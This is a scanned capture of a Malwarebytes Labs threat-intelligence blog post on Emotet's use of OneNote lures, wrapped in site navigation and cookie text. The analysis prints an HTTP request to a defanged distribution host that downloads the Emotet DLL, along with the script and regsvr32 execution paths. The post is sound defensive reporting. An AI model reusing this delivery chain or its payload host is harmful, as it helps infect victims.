www.malwarebytes.com
Open in
urlscan Pro
2600:9000:20c3:5200:16:26c7:ff80:93a1
Public Scan
URL:
https://www.malwarebytes.com/blog/threat-intelligence/2023/03/emotet-onenote
Submission: On May 18 via api from TR — Scanned from DE
Submission: On May 18 via api from TR — Scanned from DE
Form analysis 2 forms found in the DOM
GET
<form id="search-form" onsubmit="submitSearchBlog(event)" method="get">
<div class="searchbar-wrap-rightrail">
<label for="cta-labs-rightrail-search-submit-en" aria-label="cta-labs-rightrail-search-submit-en" aria-labelledby="cta-labs-rightrail-search-submit-en">
<input type="text" id="st-search-input-rightrail" class="st-search-input-rightrail" placeholder="Search Labs">
</label>
<button type="submit" id="cta-labs-rightrail-search-submit-en" aria-label="Submit your search query">
<svg class="svg-icon svg-stroke-mwb-blue svg-search">
<use href="/images/component-project/templates/blog/blog-svg.svg#svg-search"></use>
</svg>
</button>
</div>
</form>/newsletter/
<form class="newsletter-form form-inline" action="/newsletter/">
<div class="email-input">
<label for="cta-footer-newsletter-input-email-en" aria-label="cta-footer-newsletter-input-email-en" aria-labelledby="cta-footer-newsletter-input-email-en">
<input type="text" class="email-input-field" id="cta-footer-newsletter-input-email-en" name="email" placeholder="Email Address">
</label>
<input name="source" type="hidden" value="">
<input type="submit" class="submit-bttn" id="cta-footer-newsletter-subscribe-email-en" value="">
</div>
</form>Text Content
Personal
Personal
* Security & Antivirus
* Free virus removal >
* Malwarebytes Premium for Windows >
* Malwarebytes Premium for Mac >
* Malwarebytes for Chromebook >
* Malwarebytes Premium for Android >
* Malwarebytes Premium for iOS >
* Malwarebytes Premium for Teams >
* Malwarebytes Premium + Privacy VPN >
* AdwCleaner for Windows >
*
Online Privacy
* Malwarebytes Privacy VPN >
* Malwarebytes Browser Guard >
* How can we help?
* Have a current computer infection?
CLEAN YOUR DEVICE NOW
*
* Try out Malwarebytes Premium, with a full-featured trial
DOWNLOAD NOW
*
* Find the right solution for you
SEE PERSONAL PRICING
*
* Activate, upgrade and manage your subscription in MyAccount
SIGN IN TO YOUR ACCOUNT
*
* Get answers to frequently asked questions and troubleshooting tips
VISIT OUR SUPPORT PAGE
Business
Business
* Solutions
* BY COMPANY SIZE
* Small Businesses
* 1-99 Employees
* Mid-size Businesses
* 100-999 Employees
* Large Enterprise
* 1000+ Employees
* BY INDUSTRY
* Education
* Finance
* Healthcare
* Government
* Products
* CLOUD-BASED SECURITY MANAGEMENT
* Endpoint Protection
* Endpoint Protection for Servers
* Endpoint Detection & Response
* Endpoint Detection & Response for Servers
* Incident Response
* Nebula Platform Architecture
* Mobile Security
* CLOUD-BASED SECURITY MODULES
* DNS Filtering
* Vulnerability & Patch Management
* Remediation Connector Solution
* Application Block
* SECURITY SERVICES
* Managed Detection and Response
* Cloud Storage Scanning Service
* Malware Removal Service
* NEXT-GEN ANTIVIRUS FOR SMALL BUSINESS
* For Teams
* Get Started
* * Find the right solution for your business
* See business pricing
--------------------------------------------------------------------------------
* Don't know where to start?
* Help me choose a product
--------------------------------------------------------------------------------
* See what Malwarebytes can do for you
* Get a free trial
--------------------------------------------------------------------------------
* Our sales team is ready to help. Call us now
* +49 (800) 723-4800
Pricing
Partners
Partners
* Explore Partnerships
* Partner Solutions
* Resellers
* Managed Service Providers
* Computer Repair
* Technology Partners
* Contact Us
* Partner Success Story
* Marek Drummond
Managing Director at Optimus Systems
"Thanks to the Malwarebytes MSP program, we have this high-quality product in
our stack. It’s a great addition, and I have confidence that customers’
systems are protected."
* See full story
Resources
Resources
* Learn About Cybersecurity
* Antivirus
* Malware
* Ransomware
* Malwarebytes Labs – Blog
* Glossary
* Threat Center
* Business Resources
* Reviews
* Analyst Reports
* Case Studies
* Press & News
* Reports
*
The State of Malware 2023 Report
* See Report
Support
Support
* Technical Support
* Personal Support
* Business Support
* Premium Services
* Forums
* Vulnerability Disclosure
* Report a False Positive
* Product Videos
*
* Featured Content
*
Activate Malwarebytes Privacy on Windows device.
* See Content
FREE DOWNLOAD
CONTACT US
CONTACT US
* Personal Support
* Business Support
* Talk to Sales
* Contact Press
* Partner Programs
* Submit Vulnerability
COMPANY
COMPANY
* About Malwarebytes
* Careers
* News & Press
SIGN IN
SIGN IN
* MyAccount: manage your personal/Teams subscription >
* Cloud Console: manage your cloud business products >
* Partner Portal: management for Resellers and MSPs >
SUBSCRIBE
Threat Intelligence
EMOTET ADOPTS MICROSOFT ONENOTE ATTACHMENTS
Posted: March 16, 2023 by Threat Intelligence Team
Emotet finally got the memo and added Microsoft OneNote lures.
Last week, Emotet returned after a three month absence when the botnet Epoch 4
started sending out malicious emails with malicious Office macros. While the
extracted attachments were inflated to several hundred megabytes, it was
surprising to see that Emotet persisted in using the same attack format.
Indeed, Microsoft has been rolling out its initiative of auto-blocking macros
from downloaded documents since last summer. This has forced criminals to
revisit how they want to deliver malware via malspam. One noticeable change was
the use of Microsoft OneNote documents by several other criminal gangs. Now, it
is Emotet's turn to follow along.
The OneNote file is simple but yet effective at social engineering users with a
fake notification stating that the document is protected. When instructed to
double-click on the View button, victims will inadvertently double-click on an
embedded script file instead.
This triggers Windows scripting engine (wscript.exe) to execute the following
command:
%Temp%\OneNote\16.0\NT\0\click.wsf"
The heavily obfuscated script retrieves the Emotet binary payload from a remote
site
GET https://penshorn[.]org/admin/Ses8712iGR8du/ HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: penshorn.org
The file is saved as a DLL and executed via regsvr32.exe:
%Temp%\OneNote\16.0\NT\0\rad44657.tmp.dll"
Once installed on the system, Emotet will then communicate with its command and
control servers to receive further instructions.
As Emotet ramps up its malspam distribution, users should be particularly
careful of this threat which we featured in our 2023 State of Malware Report, as
it serves as an entry point for other threat actors keen on dropping ransomware.
Malwarebytes customers are protected against this threat at several layers
within its attack chain including web protection, malware blocking. Our EDR
product also flags the whole sequence:
Although Emotet has had vacations, retirements and even been taken down by
authorities before, it continues to be a serious threat and highlights how
social engineering attacks are so effective. While macros may soon be a thing of
the past, we can see that threat actors can leverage a variety of popular
business applications to achieve their end goal of gaining a foothold onto
enterprise networks.
We will continue to monitor any new developments with Emotet to ensure our
customers remain protected.
--------------------------------------------------------------------------------
Malwarebytes removes all remnants of ransomware and prevents you from getting
reinfected. Want to learn more about how we can help protect your business? Get
a free trial below.
TRY NOW
SHARE THIS ARTICLE
--------------------------------------------------------------------------------
COMMENTS
--------------------------------------------------------------------------------
RELATED ARTICLES
News
ZIP DOMAINS, A BAD IDEA NOBODY ASKED FOR
May 18, 2023 - Just, why?
CONTINUE READING 0 Comments
Personal
CHILD SAFETY APP RIDDLED WITH VULNERABILITIES: UPDATE NOW!
May 18, 2023 - Child safety app "Parental Control - Kids Place" has been found
to have five vulnerabilities. You need to patch immediately to keep yourself
secure.
CONTINUE READING 0 Comments
Exploits and vulnerabilities | News | Personal
KEEPASS VULNERABILITY ALLOWS ATTACKERS TO ACCESS THE MASTER PASSWORD
May 18, 2023 - There is a Proof-of-Concept available for an unpatched
vulnerability in KeePass that allows attackers to dump the master password.
CONTINUE READING 0 Comments
News
LEAKED BABUK RANSOMWARE BUILDER CODE LIVES ON AS RA GROUP
May 17, 2023 - We take a look at yet another ransomware group making use of
leaked Babuk code.
CONTINUE READING 0 Comments
News | Ransomware
PHARMERICA BREACH IMPACTS ALMOST 6 MILLION PEOPLE
May 17, 2023 - US pharmacy giant PharMerica has reported a cybersecurity
incident that affects over 5.8 million people. The data theft has been claimed
by ransomware group Money Message.
CONTINUE READING 0 Comments
--------------------------------------------------------------------------------
ABOUT THE AUTHOR
Threat Intelligence Team
Contributors
Threat Center
Podcast
Glossary
Scams
Write for Labs
Cyberprotection for every one.
Cybersecurity info you can't do without
Want to stay informed on the latest news in cybersecurity? Sign up for our
newsletter and learn how to protect your computer from threats.
Cyberprotection for every one.
FOR PERSONAL
Windows
Mac
iOS
Android
VPN Connection
SEE ALL
COMPANY
About Us
Contact Us
Careers
News and Press
Blog
Scholarship
Forums
FOR BUSINESS
Small Businesses
Mid-size Businesses
Large Enterprise
Endpoint Protection
Endpoint Detection & Response
Managed Detection and Response (MDR)
FOR PARTNERS
Managed Service Provider (MSP) Program
Resellers
MY ACCOUNT
Sign In
SOLUTIONS
Free Rootkit Scanner
Free Trojan Scanner
Free Virus Scanner
Free Spyware Scanner
Anti Ransomware Protection
SEE ALL
ADDRESS
3979 Freedom Circle
12th Floor
Santa Clara, CA 95054
ADDRESS
One Albert Quay
2nd Floor
Cork T12 X8N6
Ireland
LEARN
Malware
Hacking
Phishing
Ransomware
Computer Virus
Antivirus
What is VPN?
COMPANY
About Us
Contact Us
Careers
News and Press
Blog
Scholarship
Forums
MY ACCOUNT
Sign In
ADDRESS
3979 Freedom Circle, 12th Floor
Santa Clara, CA 95054
ADDRESS
One Albert Quay, 2nd Floor
Cork T12 X8N6
Ireland
English
Legal
Privacy
Accessibility
Vulnerability Disclosure
Terms of Service
© 2023 All Rights Reserved
Select your language
* English
* Deutsch
* Español
* Français
* Italiano
* Português (Portugal)
* Português (Brasil)
* Nederlands
* Polski
* Pусский
* 日本語
* Svenska
New Buy Online Partner Icon Warning Icon Edge icon
This site uses cookies in order to enhance site navigation, analyze site usage
and marketing efforts. Please see our privacy policy for more information.
Privacy Policy
Cookies Settings Decline All Accept All Cookies
PRIVACY PREFERENCE CENTER
When you visit any website, it may store or retrieve information on your
browser, mostly in the form of cookies. This information might be about you,
your preferences or your device and is mostly used to make the site work as you
expect it to. The information does not usually directly identify you, but it can
give you a more personalized web experience. Because we respect your right to
privacy, you can choose not to allow some types of cookies. Click on the
different category headings to find out more and change our default settings.
However, blocking some types of cookies may impact your experience of the site
and the services we are able to offer.
Privacy Policy
Allow All
MANAGE CONSENT PREFERENCES
STRICTLY NECESSARY
Always Active
These cookies are necessary for the website to function and cannot be switched
off in our systems. They are usually only set in response to actions made by you
which amount to a request for services, such as setting your privacy
preferences, logging in or filling in forms. You can set your browser to
block or alert you about these cookies, but some parts of the site will not then
work. These cookies do not store any personally identifiable information.
Cookies Details
PERFORMANCE AND FUNCTIONALITY
Performance and Functionality
These cookies enable the website to provide enhanced functionality and
personalisation. They may be set by us or by third party providers whose
services we have added to our pages. If you do not allow these cookies then
some or all of these services may not function properly.
Cookies Details
SOCIAL MEDIA
Social Media
These cookies are set by a range of social media services that we have added to
the site to enable you to share our content with your friends and networks. They
are capable of tracking your browser across other sites and building up a
profile of your interests. This may impact the content and messages you see on
other websites you visit. If you do not allow these cookies you may not be
able to use or see these sharing tools.
Cookies Details
ANALYTICS
Analytics
These cookies allow us to count visits and traffic sources so we can measure and
improve the performance of our site. They help us to know which pages are the
most and least popular and see how visitors move around the site. All
information these cookies collect is aggregated and therefore anonymous. If you
do not allow these cookies we will not know when you have visited our site, and
will not be able to monitor its performance.
Cookies Details
ADVERTISING
Advertising
These cookies may be set through our site by our advertising partners. They may
be used by those companies to build a profile of your interests and show you
relevant adverts on other sites. They do not store directly personal
information, but are based on uniquely identifying your browser and internet
device. If you do not allow these cookies, you will experience less targeted
advertising.
Cookies Details
Back Button
BACK
Search Icon
Filter Icon
Clear
checkbox label label
Apply Cancel
Consent Leg.Interest
checkbox label label
checkbox label label
checkbox label label
*
View Cookies
* Name
cookie name
Decline All Confirm My Choices